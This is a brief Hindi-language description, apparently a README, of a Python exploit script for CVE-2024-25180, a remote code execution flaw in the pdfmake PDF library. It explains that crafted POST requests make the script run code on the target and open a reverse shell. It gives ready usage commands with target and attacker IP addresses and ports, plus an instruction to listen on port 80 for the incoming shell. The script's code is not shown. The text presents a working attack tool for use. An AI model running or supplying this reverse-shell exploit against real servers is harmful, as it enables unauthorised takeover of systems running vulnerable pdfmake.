
CVE-2024-25180 के लिए पायथन एक्सप्लॉइट स्क्रिप्ट, pdfmake में एक रिमोट कोड एक्जीक्यूशन कमजोरी, जो क्राफ्टेड POST अनुरोधों के माध्यम से रिवर्स शेल प्रदान करती है।
pdfmake एक शुद्ध जावास्क्रिप्ट क्लाइंट/सर्वर साइड PDF प्रिंटिंग इस पैकेज का प्रभावित संस्करण मनमाना कोड इंजेक्शन हमलों के लिए संवेदनशील है, हमलावर पथ पर एक विशेष रूप से डिज़ाइन किया गया POST अनुरोध भेजकर मनमाना कोड/pdf निष्पादित कर सकता है। हमलावर एक विशेष रूप से डिज़ाइन किए गए अनुरोध भेजकर सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं।
CVE-2024-25180 pdfmake में दूरस्थ कोड निष्पादन
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
पोर्ट 80 पर सुनें, रिवर्स शेल प्राप्त करें
